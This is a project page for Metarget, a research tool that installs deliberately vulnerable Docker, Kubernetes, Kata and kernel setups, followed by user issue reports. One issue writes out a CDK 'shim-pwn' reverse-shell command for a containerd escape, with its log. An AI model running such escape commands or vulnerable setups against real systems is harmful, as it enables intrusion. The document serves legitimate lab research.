framework providing automatic constructions of vulnerable infrastructures

Overview

1 Introduction

Metarget = meta- + target, a framework for automatically constructing vulnerable infrastructures, used to deploy simple or complex vulnerable cloud native targets swiftly and automatically.

1.1 Why Metarget?

During security research we often find that deploying a vulnerable environment takes a lot of time, while the time actually spent testing a PoC or exploit is comparatively short. In cloud native security this problem is even worse, because of the complexity of cloud native systems.

There are already excellent open-source security projects such as Vulhub and VulApps, which package vulnerable scenes into container images so that researchers can deploy them quickly.

However, these projects mainly focus on vulnerabilities in applications. What if we need to study vulnerabilities in the infrastructure itself, such as Docker, Kubernetes or even the Linux kernel?

Hence, we developed Metarget and hope it solves the deployment issue above to some extent. Furthermore, we expect Metarget to help construct multilayer vulnerable cloud native scenes automatically.

1.2 Install Vulnerability!

In this project we introduce the concepts of installing vulnerabilities and installing vulnerable scenes. Why not install vulnerabilities just like installing software? We can, because our goals are security research and offensive security.

To be exact, we expect that:

  • metarget cnv install cve-2019-5736 will install Docker with CVE-2019-5736 onto the server.
  • metarget cnv install cve-2018-1002105 will install Kubernetes with CVE-2018-1002105 onto the server.
  • metarget cnv install kata-escape-2020 will install Kata-containers with CVE-2020-2023/2025/2026 onto the server.
  • metarget cnv install cve-2016-5195 will install a kernel with DirtyCoW onto the server.

It's cool, right? No more steps. No RTFM. Execute one command and enjoy your coffee.

Furthermore, we expect that:

  • with Metarget's help, ethical hackers are able to deploy simple or complicated cloud native targets swiftly and learn by hacking cloud native environments.
  • metarget appv install dvwa will install a DVWA target onto our vulnerable infrastructure.
  • metarget appv install thinkphp-5-0-23-rce --external will install a ThinkPHP RCE vulnerability with NodePort service onto our vulnerable infrastructure.

After installing a fresh Ubuntu, you can run the 5 commands below and obtain a multi-layer vulnerable scene:

./metarget cnv install cve-2016-5195 # container escape with dirtyCoW
./metarget cnv install cve-2019-5736 # container escape with docker
./metarget cnv install cve-2018-1002105 # kubernetes single-node cluster with cve-2018-1002105
./metarget cnv install privileged-container # deploy a privileged container
./metarget appv install dvwa --external # deploy dvwa target

RCE, container escape, lateral movement, persistence, they are yours now.

More awesome functions are coming! Stay tuned :)

Note:

This project aims to provide vulnerable scenes for security research. The security of the scenes generated is not guaranteed. Deploying components or scenes with Metarget on hosts reachable from the Internet is NOT recommended.

2 Usage

2.1 Basic Usage

usage: metarget [-h] [-v] subcommand ...

automatic constructions of vulnerable infrastructures

positional arguments:
  subcommand     description
    gadget       cloud native gadgets (docker/k8s/...) management
    cnv          cloud native vulnerabilities management
    appv         application vulnerabilities management

optional arguments:
  -h, --help     show this help message and exit
  -v, --version  show program's version number and exit

Run ./metarget gadget list to see the cloud native components currently supported.

2.2 Manage Cloud Native Components

usage: metarget gadget [-h] subcommand ...

positional arguments:
  subcommand  description
    list      list supported gadgets
    install   install gadgets
    remove    uninstall gadgets

optional arguments:
  -h, --help  show this help message and exit

2.2.1 Case: Install Docker with Specified Version

Run:

./metarget gadget install docker --version 18.03.1

If the command above completes successfully, Docker 18.03.1 will be installed.

2.2.2 Case: Install Kubernetes with Specified Version

Run:

./metarget gadget install k8s --version 1.16.5

If the command above completes successfully, a single-node Kubernetes 1.16.5 cluster will be installed.

Note:

A Kubernetes installation normally involves a lot of configuration. As a security research project, Metarget exposes only a few options for installing Kubernetes:

  -v VERSION, --version VERSION
                        gadget version
  --cni-plugin CNI_PLUGIN
                        cni plugin, flannel by default
  --pod-network-cidr POD_NETWORK_CIDR
                        pod network cidr, default cidr for each plugin by
                        default
  --taint-master        taint master node or not

Metarget supports deployment of multi-node clusters. To add more nodes to the cluster, copy the tools/install_k8s_worker.sh script and run it on each worker node after the single-node cluster has been installed successfully.

2.2.3 Case: Install Kata-containers with Specified Version

Run:

./metarget gadget install kata --version 1.10.0

If the command above completes successfully, Kata Containers 1.10.0 will be installed.

Note:

You can also specify the type of Kata runtime (qemu/clh/fc/...) with the --kata-runtime-type option; the default is qemu.

2.2.4 Case: Install Linux Kernel with Specified Version

Run:

./metarget gadget install kernel --version 5.7.5

If the command above completes successfully, kernel 5.7.5 will be installed.

Note:

Currently, Metarget installs kernels in two ways:

  1. via apt
  2. if no apt package is available, by downloading the *.deb packages from Ubuntu and trying to install them

After a kernel has been installed successfully, the system needs to be rebooted. Metarget will prompt you to reboot.

2.3 Manage Vulnerable Scenes Related to Cloud Native Components

usage: metarget cnv [-h] subcommand ...

positional arguments:
  subcommand  description
    list      list supported cloud native vulnerabilities
    install   install cloud native vulnerabilities
    remove    uninstall cloud native vulnerabilities

optional arguments:
  -h, --help  show this help message and exit

Run ./metarget cnv list to see the currently supported vulnerable scenes related to cloud native components.

2.3.1 Case: CVE-2019-5736

Run:

./metarget cnv install cve-2019-5736

If the command above completes successfully, Docker with CVE-2019-5736 will be installed.

2.3.2 Case: CVE-2018-1002105

Run:

./metarget cnv install cve-2018-1002105

If the command above completes successfully, Kubernetes with CVE-2018-1002105 will be installed.

2.3.3 Case: Kata-containers Escape

Run:

./metarget cnv install kata-escape-2020

If the command above completes successfully, Kata Containers with CVE-2020-2023/2025/2026 will be installed.

2.3.4 Case: CVE-2016-5195

Run:

./metarget cnv install cve-2016-5195

If the command above completes successfully, a kernel with CVE-2016-5195 will be installed.

2.4 Manage Vulnerable Scenes Related to Cloud Native Applications

usage: metarget appv [-h] subcommand ...

positional arguments:
  subcommand  description
    list      list supported application vulnerabilities
    install   install application vulnerabilities
    remove    uninstall application vulnerabilities

optional arguments:
  -h, --help  show this help message and exit

Run ./metarget appv list to see the currently supported vulnerable scenes related to cloud native applications.

Note:

Before deploying application vulnerable scenes, you must install Docker and Kubernetes first. You can use Metarget to install both.

2.4.1 Case: DVWA

Run:

./metarget appv install dvwa

If the command above completes successfully, DVWA will be deployed as Deployment and Service resources in the current Kubernetes cluster.

Note:

If you specify the --external option, the Service is exposed as NodePort, so that you can reach it via the IP of the host node.

By default, the Service type is ClusterIP.
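The --external switch described above flips the generated Service from ClusterIP to NodePort. As an added example (illustrative code for this page, not Metarget's own implementation), here is that rewrite applied to a constructed Service manifest modelled on kompose output for the dvwa scene; the resource name and labels are assumptions, and so is the 30000-32767 port range, which is kube-apiserver's default node port range.

```python
"""Added example: turn a kompose-generated ClusterIP Service into a NodePort one.

Illustrative code written for this page, not Metarget's implementation of
--external. The manifest below is constructed to look like kompose output for
the dvwa scene; the real one may differ.
"""
import copy
import json

# kube-apiserver's default --service-node-port-range (assumption: the cluster
# was installed with the default range).
NODEPORT_RANGE = range(30000, 32768)

# Constructed sample: a Service as kompose would emit it (no type = ClusterIP).
DVWA_SERVICE = {
    "apiVersion": "v1",
    "kind": "Service",
    "metadata": {"name": "dvwa", "labels": {"io.kompose.service": "dvwa"}},
    "spec": {
        "selector": {"io.kompose.service": "dvwa"},
        "ports": [{"name": "80", "port": 80, "targetPort": 80}],
    },
}


def expose_as_nodeport(service, node_ports=None):
    """Return a copy of a ClusterIP Service manifest rewritten to type NodePort.

    node_ports, if given, pins an explicit nodePort to each entry of spec.ports
    in order; otherwise the API server allocates one from the range.
    The input dict is left untouched so the ClusterIP variant can still be applied.
    """
    if service.get("kind") != "Service":
        raise ValueError("manifest is not a Service")
    svc = copy.deepcopy(service)
    spec = svc.setdefault("spec", {})
    current = spec.get("type", "ClusterIP")          # absent type means ClusterIP
    if current != "ClusterIP":
        raise ValueError("refusing to rewrite a %s Service" % current)
    spec["type"] = "NodePort"
    if node_ports:
        ports = spec.get("ports", [])
        if len(node_ports) != len(ports):
            raise ValueError("need exactly one nodePort per service port")
        for port, node_port in zip(ports, node_ports):
            if node_port not in NODEPORT_RANGE:
                raise ValueError("nodePort %d is outside %s" % (node_port, NODEPORT_RANGE))
            port["nodePort"] = node_port
    return svc


def render(service):
    """Serialise a manifest as JSON, which kubectl apply -f accepts as readily as YAML."""
    return json.dumps(service, indent=2, sort_keys=True)


if __name__ == "__main__":
    print(render(expose_as_nodeport(DVWA_SERVICE, node_ports=[30080])))
```

A NodePort binds the chosen port on every node's interfaces, which is exactly why the note in section 1 says not to deploy scenes on Internet-facing hosts; it also means kubectl get svc shows you the port to browse to on the node IP.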

2.5 Manage Vulnerable Cloud Native Target Cluster

Under development, currently not supported.

3 Installation

3.1 Requirements

  • Ubuntu 16.04 or 18.04
  • Python >= 3.5
  • pip3

3.2 From Source

Clone the repository and install requirements:

git clone https://github.com/brant-ruan/metarget.git
cd metarget/
pip install -r requirements.txt

You can then start using Metarget to construct vulnerable scenes. For example:

./metarget cnv install cve-2019-5736

3.3 From PyPI

Currently unsupported.

4 Scene List

4.1 Vulnerable Scenes Related to Cloud Native Components

Name                            Class              Type
cve-2018-15664                  docker             container_escape
cve-2019-13139                  docker             command_execution
cve-2019-14271                  docker             container_escape
cve-2020-15257                  docker/containerd  container_escape
cve-2019-5736                   docker/runc        container_escape
cve-2017-1002101                kubernetes         container_escape
cve-2018-1002105                kubernetes         privilege_escalation
cve-2019-11253                  kubernetes         denial_of_service
cve-2019-9512                   kubernetes         denial_of_service
cve-2019-9514                   kubernetes         denial_of_service
cve-2020-8554                   kubernetes         man_in_the_middle
cve-2020-8558                   kubernetes         exposure_of_service
cve-2016-5195                   kernel             container_escape
cve-2020-14386                  kernel             container_escape
cap_dac_read_search-container   config             container_escape
cap_sys_admin-container         config             container_escape
cap_sys_ptrace-container        config             container_escape
privileged-container            config             container_escape
mount-docker-sock               mount              container_escape
mount-host-etc                  mount              container_escape
mount-host-procfs               mount              container_escape
kata-escape-2020                kata-containers    container_escape
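The config and mount scenes in this table each hand the container one concrete primitive: an extra capability, the privileged flag, or a host path. As an added example that is not part of Metarget, the checker below decodes CapEff from /proc/self/status and scans /proc/self/mounts, then reports which of the scene names above its findings correspond to, which is a quick way to confirm from inside a pod what a deployed scene actually gave you. The sample status and mount lines are constructed; the mount rules (a docker.sock mountpoint, a second procfs, host /etc mounted over /etc) are my assumptions about how those scenes look from inside, not the project's definitions.

```python
"""Added example: work out which escape primitives a container actually has.

Illustrative code for this page, not part of Metarget. It reads the same
sources a researcher checks by hand inside a pod (/proc/self/status for the
capability sets, /proc/self/mounts for bind mounts) and maps them onto the
config/mount scene names from the table above. The mount heuristics are
assumptions about how those scenes mount host paths, not Metarget's definitions.
"""
import re

# Capability bit numbers, in order, from include/uapi/linux/capability.h.
CAP_NAMES = [
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER",
    "CAP_FSETID", "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP",
    "CAP_LINUX_IMMUTABLE", "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST",
    "CAP_NET_ADMIN", "CAP_NET_RAW", "CAP_IPC_LOCK", "CAP_IPC_OWNER",
    "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT", "CAP_SYS_PTRACE",
    "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE",
    "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD",
    "CAP_LEASE", "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP",
    "CAP_MAC_OVERRIDE", "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM",
    "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ", "CAP_PERFMON", "CAP_BPF",
    "CAP_CHECKPOINT_RESTORE",
]

# Scenes from the table above that add a single capability to the default set.
CAP_SCENES = {
    "CAP_DAC_READ_SEARCH": "cap_dac_read_search-container",
    "CAP_SYS_PTRACE": "cap_sys_ptrace-container",
    "CAP_SYS_ADMIN": "cap_sys_admin-container",
}


def decode_caps(hex_mask):
    """Expand a CapEff/CapBnd hex string into the capability names it sets."""
    mask = int(hex_mask, 16)
    return [name for bit, name in enumerate(CAP_NAMES) if mask >> bit & 1]


# Docker's default capability set (CapEff 00000000a80425fb in an unmodified container).
DOCKER_DEFAULT_CAPS = frozenset(decode_caps("a80425fb"))


def effective_caps(status_text):
    """Pull CapEff out of the text of /proc/self/status."""
    m = re.search(r"^CapEff:\s*([0-9a-fA-F]+)\s*$", status_text, re.MULTILINE)
    if m is None:
        raise ValueError("no CapEff line found")
    return decode_caps(m.group(1))


def classify(status_text, mounts_text):
    """Return the scene names whose primitive is present, plus any non-default caps."""
    caps = set(effective_caps(status_text))
    matched = set()
    # Assumption: 'privileged' means every capability a 4.x/5.x kernel knows, bits 0..37.
    if all(c in caps for c in CAP_NAMES[:38]):
        matched.add("privileged-container")
    for cap, scene in CAP_SCENES.items():
        if cap in caps:
            matched.add(scene)
    for line in mounts_text.splitlines():
        fields = line.split()              # device mountpoint fstype options dump pass
        if len(fields) < 3:
            continue
        mountpoint, fstype = fields[1], fields[2]
        if mountpoint.endswith("docker.sock"):
            matched.add("mount-docker-sock")             # daemon socket reachable
        elif fstype == "proc" and mountpoint != "/proc":
            matched.add("mount-host-procfs")             # second procfs = host's
        elif mountpoint == "/etc":
            matched.add("mount-host-etc")                # assumption: host /etc over /etc
    return {
        "scenes": sorted(matched),
        "extra_caps": sorted(caps - DOCKER_DEFAULT_CAPS),
    }


# Constructed samples: a container run with --cap-add SYS_ADMIN and the Docker
# socket bind-mounted. Real files contain more lines; only these matter here.
SAMPLE_STATUS = "Name:\tbash\nCapPrm:\t00000000a82425fb\nCapEff:\t00000000a82425fb\n"
SAMPLE_MOUNTS = """\
overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/A:/var/lib/docker/overlay2/l/B 0 0
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
/dev/sda1 /etc/resolv.conf ext4 rw,relatime 0 0
tmpfs /run/docker.sock tmpfs rw,nosuid,nodev,mode=755 0 0
"""

if __name__ == "__main__":
    # In a live pod, replace the samples with open("/proc/self/status").read()
    # and open("/proc/self/mounts").read().
    print(classify(SAMPLE_STATUS, SAMPLE_MOUNTS))
```

Docker's per-file bind mounts of /etc/hosts, /etc/hostname and /etc/resolv.conf show up as device-backed ext4 entries in every container, so a checker that flags any non-overlay mount would fire on every pod; the rules above deliberately key on the mountpoint and filesystem type instead.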

4.2 Vulnerable Scenes Related to Cloud Native Applications

These scenes are mainly derived from other open-source projects:

We express sincere gratitude to the projects above!

Metarget converts the scenes from the projects above into Kubernetes Deployment and Service resources (thanks to kompose).

To list vulnerable scenes related to cloud native applications supported by Metarget, just run:

./metarget appv list

5 DEMO

(asciinema demo recording)

6 Development Plan

  • deployments of basic cloud native components (docker, k8s)
  • integrations of vulnerable scenes related to cloud native components
  • integrations of RCE scenes in containers
  • automatic construction of multi-node cloud native target cluster
  • integrations of other cloud native vulnerable scenes (long term)

7 About Logo

It is not a Kubernetes logo, but a vulnerable infrastructure with three gears that cannot work properly (vulnerable) :)

Comments
  • Meet some errors when installing cve-2018-1002105

    When I use the command "./metarget cnv install cve-2018-1002105 --domestic" and the output gets to "running kubeadm", I meet some errors. The error is as follows: [screenshot]

    Really hope someone can help me, thanks

    opened by painsAgains 4
  • A small issue when configuring cve-2020-15257

    I set up the environment on Ubuntu 18.04 and on 16.04; both ended with the result shown below. The Linux kernel version is 5.8.0-59-generic.

    sudo ./metarget cnv install cve-2020-15257 --verbose
    cve-2020-15257 is going to be installed
    uninstalling current docker gadgets if applicable
    Reading package lists... Done
    Building dependency tree       
    Reading state information... Done
    The following packages were automatically installed and are no longer required:
      aufs-tools cgroupfs-mount pigz
    Use 'sudo apt autoremove' to remove them.
    The following packages will be REMOVED:
      docker-ce
    0 upgraded, 0 newly installed, 1 to remove and 444 not upgraded.
    After this operation, 181 MB disk space will be freed.
    (Reading database ... 133309 files and directories currently installed.)
    Removing docker-ce (18.03.1~ce~3-0~ubuntu) ...
    Processing triggers for man-db (2.8.3-2ubuntu0.1) ...
    Reading package lists... Done
    Building dependency tree       
    Reading state information... Done
    Package 'docker' is not installed, so not removed
    The following packages were automatically installed and are no longer required:
      aufs-tools cgroupfs-mount pigz
    Use 'sudo apt autoremove' to remove them.
    0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
    Reading package lists... Done
    Building dependency tree       
    Reading state information... Done
    Package 'docker-engine' is not installed, so not removed
    The following packages were automatically installed and are no longer required:
      aufs-tools cgroupfs-mount pigz
    Use 'sudo apt autoremove' to remove them.
    0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
    Reading package lists... Done
    Building dependency tree       
    Reading state information... Done
    Package 'docker.io' is not installed, so not removed
    The following packages were automatically installed and are no longer required:
      aufs-tools cgroupfs-mount pigz
    Use 'sudo apt autoremove' to remove them.
    0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
    Reading package lists... Done
    Building dependency tree       
    Reading state information... Done
    Package 'containerd' is not installed, so not removed
    The following packages were automatically installed and are no longer required:
      aufs-tools cgroupfs-mount pigz
    Use 'sudo apt autoremove' to remove them.
    0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
    Reading package lists... Done
    Building dependency tree       
    Reading state information... Done
    Package 'runc' is not installed, so not removed
    The following packages were automatically installed and are no longer required:
      aufs-tools cgroupfs-mount pigz
    Use 'sudo apt autoremove' to remove them.
    0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
    installing prerequisites
    Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease
    Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease          
    Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease                                  
    Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease                                   
    Hit:5 http://archive.ubuntu.com/ubuntu xenial-updates InRelease                                               
    Hit:6 http://archive.ubuntu.com/ubuntu bionic-updates InRelease
    Hit:7 https://download.docker.com/linux/ubuntu bionic InRelease
    Reading package lists... Done         
    Reading package lists... Done
    Building dependency tree       
    Reading state information... Done
    ca-certificates is already the newest version (20210119~18.04.1).
    software-properties-common is already the newest version (0.96.24.32.14).
    apt-transport-https is already the newest version (1.6.13).
    gnupg-agent is already the newest version (2.2.4-1ubuntu1.4).
    The following packages were automatically installed and are no longer required:
      aufs-tools cgroupfs-mount pigz
    Use 'sudo apt autoremove' to remove them.
    0 upgraded, 0 newly installed, 0 to remove and 444 not upgraded.
    adding apt repository deb [arch=amd64] https://download.docker.com/linux/ubuntu bionic stable
    OK
    Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease
    Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease                                                                                     
    Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease                                                                                   
    Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease                                                                                                              
    Hit:5 https://download.docker.com/linux/ubuntu bionic InRelease                                                                                                                          
    Hit:6 http://archive.ubuntu.com/ubuntu xenial-updates InRelease
    Hit:7 http://archive.ubuntu.com/ubuntu bionic-updates InRelease
    Reading package lists... Done
    adding apt repository deb http://archive.ubuntu.com/ubuntu xenial-updates universe
    Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease
    Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease                                                               
    Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease                                                             
    Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease                                                                                                              
    Hit:5 https://download.docker.com/linux/ubuntu bionic InRelease                                                                                                                          
    Hit:6 http://archive.ubuntu.com/ubuntu xenial-updates InRelease
    Hit:7 http://archive.ubuntu.com/ubuntu bionic-updates InRelease
    Reading package lists... Done
    adding apt repository deb http://archive.ubuntu.com/ubuntu bionic-updates universe
    Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease
    Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease                                                                                     
    Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease                                                                                                             
    Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease                                                                                                              
    Hit:5 https://download.docker.com/linux/ubuntu bionic InRelease                                                                                                                          
    Hit:6 http://archive.ubuntu.com/ubuntu xenial-updates InRelease
    Hit:7 http://archive.ubuntu.com/ubuntu bionic-updates InRelease
    Reading package lists... Done
    Hit:1 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic InRelease
    Hit:2 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-updates InRelease                                                                                                               
    Hit:3 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-backports InRelease                                                                                                             
    Hit:4 https://mirrors.tuna.tsinghua.edu.cn/ubuntu bionic-security InRelease                                                                                                              
    Hit:5 https://download.docker.com/linux/ubuntu bionic InRelease                                                                                                                          
    Hit:6 http://archive.ubuntu.com/ubuntu xenial-updates InRelease
    Hit:7 http://archive.ubuntu.com/ubuntu bionic-updates InRelease
    Reading package lists... Done
    installing docker-ce with 18.03.1~ce~3-0~ubuntu version
    Reading package lists... Done
    Building dependency tree       
    Reading state information... Done
    The following NEW packages will be installed:
      docker-ce
    0 upgraded, 1 newly installed, 0 to remove and 444 not upgraded.
    Need to get 0 B/33.9 MB of archives.
    After this operation, 181 MB of additional disk space will be used.
    Selecting previously unselected package docker-ce.
    (Reading database ... 133095 files and directories currently installed.)
    Preparing to unpack .../docker-ce_18.03.1~ce~3-0~ubuntu_amd64.deb ...
    Unpacking docker-ce (18.03.1~ce~3-0~ubuntu) ...
    Setting up docker-ce (18.03.1~ce~3-0~ubuntu) ...
    Processing triggers for ureadahead (0.100.0-21) ...
    Processing triggers for systemd (237-3ubuntu10.24) ...
    Processing triggers for man-db (2.8.3-2ubuntu0.1) ...
    warning: no candidate version for containerd
    warning: docker seems to be installed, but some errors happened during installation
    cve-2020-15257 successfully installed
    

    The installation succeeds, but a warning is shown.

    I then followed the writeup to reproduce it and could find the abstract-namespace socket. But when running the exploit, the result was as follows:

    root@ubuntu:/tmp# run shim-pwn reverse xx.xx.xx.xx 1234
    bash: run: command not found
    root@ubuntu:/tmp# ./cdk_linux_amd64 run shim-pwn reverse xx.xx.xx.xx 1234
    2021/06/28 07:55:31 tring to spawn shell to 49.232.1.8:1234
    2021/06/28 07:55:31 try socket: @/containerd-shim/moby/b2d38375588b3b988f9010ce551d785a2bdb37a497aed068c8482b0776af2910/shim.sock
    2021/06/28 07:55:31 rpc error response.:
    rpc error: code = Unknown desc = OCI runtime create failed: exec: "runc": executable file not found in $PATH
    2021/06/28 07:55:31 exploit failed.
    

    The error message shows that runc is not in PATH; running runc prompts that it needs to be installed. I found that the runc executable actually installed is docker-runc; after creating a symlink, the exploit succeeded.

    It seems that if Docker has been installed on the system before, installing the vulnerable environment with Metarget leads to this runc naming problem. I'm not sure whether this counts as a bug; perhaps it could be noted in the writeup?

    bug 
    opened by duowen1 3
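The workaround in the comment above (symlinking docker-runc to runc so that containerd-shim, which the rpc error shows execs "runc" by name from PATH, can find it), written out as an added Python example rather than Metarget's own code. The target directory /usr/local/bin is an assumption about a directory on the shim's PATH and needs root; the demo() helper rehearses the fix in a temporary directory with a constructed stand-in binary so it can be tried without touching the system.

```python
"""Added example: the runc-in-PATH workaround from the comment above.

Illustrative code for this page, not Metarget's. The error in the comment
('exec: "runc": executable file not found in $PATH') means containerd-shim
execs runc by name, while the installed binary is called docker-runc; a
symlink makes the name resolvable. bin_dir defaults to /usr/local/bin, an
assumption about a directory on the shim's PATH.
"""
import os
import shutil
import stat
import tempfile


def ensure_runc_link(bin_dir="/usr/local/bin", path=None):
    """Return a path that resolves as `runc`, creating a symlink to docker-runc if needed.

    path overrides the PATH searched (handy for testing); None means os.environ["PATH"].
    """
    existing = shutil.which("runc", path=path)
    if existing:
        return existing                                  # nothing to do
    docker_runc = shutil.which("docker-runc", path=path)
    if docker_runc is None:
        raise FileNotFoundError("neither runc nor docker-runc is in PATH")
    link = os.path.join(bin_dir, "runc")
    os.symlink(docker_runc, link)                        # raises if link already exists
    return link


def demo():
    """Rehearse the workaround in a throwaway directory with a fake docker-runc.

    Returns what was created so the behaviour can be checked without root
    and without touching the real /usr/local/bin.
    """
    work = tempfile.mkdtemp(prefix="runc-link-")
    fake = os.path.join(work, "docker-runc")
    with open(fake, "w") as f:
        f.write("#!/bin/sh\nexit 0\n")                   # constructed stand-in binary
    os.chmod(fake, os.stat(fake).st_mode | stat.S_IXUSR)
    link = ensure_runc_link(bin_dir=work, path=work)     # search only the temp dir
    second = ensure_runc_link(bin_dir=work, path=work)   # now found, no second link
    result = {
        "link": link,
        "target": os.readlink(link),
        "is_symlink": os.path.islink(link),
        "idempotent": second == link,
    }
    shutil.rmtree(work)
    return result


if __name__ == "__main__":
    print(demo())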
  • CVE-2022-0492 cannot deploy, ubuntu kernel 5.8 has been patched

    opened by awslshadowstar 2
  • Error when running ./metarget cnv list, looking for help

    Traceback (most recent call last):
      File "./metarget", line 250, in <module>
        main()
      File "./metarget", line 243, in main
        args.func(args)
      File "/home/vivoadmin/metarget-master/cmds/cnv.py", line 254, in retrieve
        vulns = vuln_loader.load_vulns_by_dir(config.vuln_cn_dir_wildcard)
      File "/home/vivoadmin/metarget-master/core/vuln_cn_manager/vuln_loader.py", line 48, in load_vulns_by_dir
        return load_vulns(vuln_files)
      File "/home/vivoadmin/metarget-master/core/vuln_cn_manager/vuln_loader.py", line 39, in load_vulns
        vuln = load_vuln(f)
      File "/home/vivoadmin/metarget-master/core/vuln_cn_manager/vuln_loader.py", line 26, in load_vuln
        vuln = yaml.load(f, Loader=yaml.SafeLoader)
      File "/usr/lib/python3/dist-packages/yaml/__init__.py", line 70, in load
        loader = Loader(stream)
      File "/usr/lib/python3/dist-packages/yaml/loader.py", line 24, in __init__
        Reader.__init__(self, stream)
      File "/usr/lib/python3/dist-packages/yaml/reader.py", line 85, in __init__
        self.determine_encoding()
      File "/usr/lib/python3/dist-packages/yaml/reader.py", line 135, in determine_encoding
        self.update(1)
      File "/usr/lib/python3/dist-packages/yaml/reader.py", line 169, in update
        self.check_printable(data)
      File "/usr/lib/python3/dist-packages/yaml/reader.py", line 144, in check_printable
        'unicode', "special characters are not allowed")
    yaml.reader.ReaderError: unacceptable character #x0088: special characters are not allowed
      in "vulns_cn/kernel/cve-2022-0185.yaml", position 304

    Has anyone encountered this? I don't know how to solve it.

    opened by fog895559 2
  • Added a simplified version of the readme file

    Thanks for pointing out the problems; a brief reply:

    1. After running the exp locally, ps -aux shows nothing abnormal and all processes on the host are visible. I'm not sure whether the shell crashing and exiting is because the /proc pseudo-filesystem is not mounted;
    2. I also felt that the writeup was long-winded and disorganised. It is mainly the notes I took while reproducing, and at the time I wanted to explain every point clearly. Kernel vulnerabilities touch a lot of ground and require the researcher to have a fairly deep understanding of many kernel mechanisms; I mainly translated the analyses of experts abroad and combined them with my own thinking about the kernel and containers. Limited by my writing ability, the overall logic may be lacking, but making the logic complete would make it very long.

    I rewrote the writeup; the heading structure is as follows, and a large amount of content was removed.

    Container escape via a Linux kernel vulnerability (CVE-2017-7308)
        Scene introduction
        Background knowledge
        Vulnerability details
            Vulnerability analysis
            Vulnerability exploitation
        Environment setup
        Vulnerability reproduction
        References
    
    opened by duowen1 2
  • Install cve-2017-7308, error: kernel package list not found.

    Hey, it's me again. I was installing cve-2017-7308. I first ran git pull to update my metarget to your repository, and then I ran ./metarget cnv install cve-2017-7308; the output is:

    cve-2017-7308 is going to be installed
    switching kernel by version
    adding apt repository deb http://security.ubuntu.com/ubuntu trusty-security main
    adding apt repository deb http://security.ubuntu.com/ubuntu xenial-security main
    adding apt repository deb http://security.ubuntu.com/ubuntu bionic-security main
    warning: no apt package for kernel 4.8.0-34
    switching kernel version with downloading packages
    retrieving package list for kernel 4.8.0-34
    error: kernel package list not found
    error: failed to install cve-2017-7308
    

    My kernel version is 5.0.0-23-generic, and my operating system is Ubuntu 18.04.

    opened by duowen1 2
  • Installing kernel vulnerability cve-2020-14386 reports that /tmp is a directory

    Running the command sudo ./metarget cnv install cve-2020-14386, the Python exception output is as follows:

    Traceback (most recent call last):
      File "./metarget", line 231, in <module>
        main()
      File "./metarget", line 224, in main
        args.func(args)
      File "/home/user/Desktop/metarget/cmds/cnv.py", line 136, in install
        gadgets=vuln['dependencies'], verbose=args.verbose):
      File "/home/user/Desktop/metarget/core/env_managers/kernel_installer.py", line 54, in install_by_version
        version, verbose=verbose)
      File "/home/user/Desktop/metarget/core/env_managers/kernel_installer.py", line 86, in _install_by_version_with_download
        cls.download_file(deb, config.kernel_packages_dir)
      File "/home/user/Desktop/metarget/core/env_managers/installer.py", line 300, in download_file
        with open(dst, 'wb') as f:
    IsADirectoryError: [Errno 21] Is a directory: '/tmp'
    

    The cause is that the string dst is '/tmp' at this point, which is a directory. Modify line 299 of metarget/core/env_managers/installer.py:

    Original code

    dst=save_path
    

    After modification

    dst=save_path+'/'+url.split('/')[-1]
    
    bug 
    opened by duowen1 1
  • Project dependencies may have API risk issues

    Hi, In metarget, inappropriate dependency versioning constraints can cause risks.

    Below are the dependencies and version constraints that the project is using

    PyYaml
    docker==5.0.0
    packaging
    requests
    beautifulsoup4
    tqdm
    prettytable==1.0.1
    

    The version constraint == will introduce the risk of dependency conflicts because the scope of dependencies is too strict. The version constraint No Upper Bound and * will introduce the risk of the missing API Error because the latest version of the dependencies may remove some APIs.

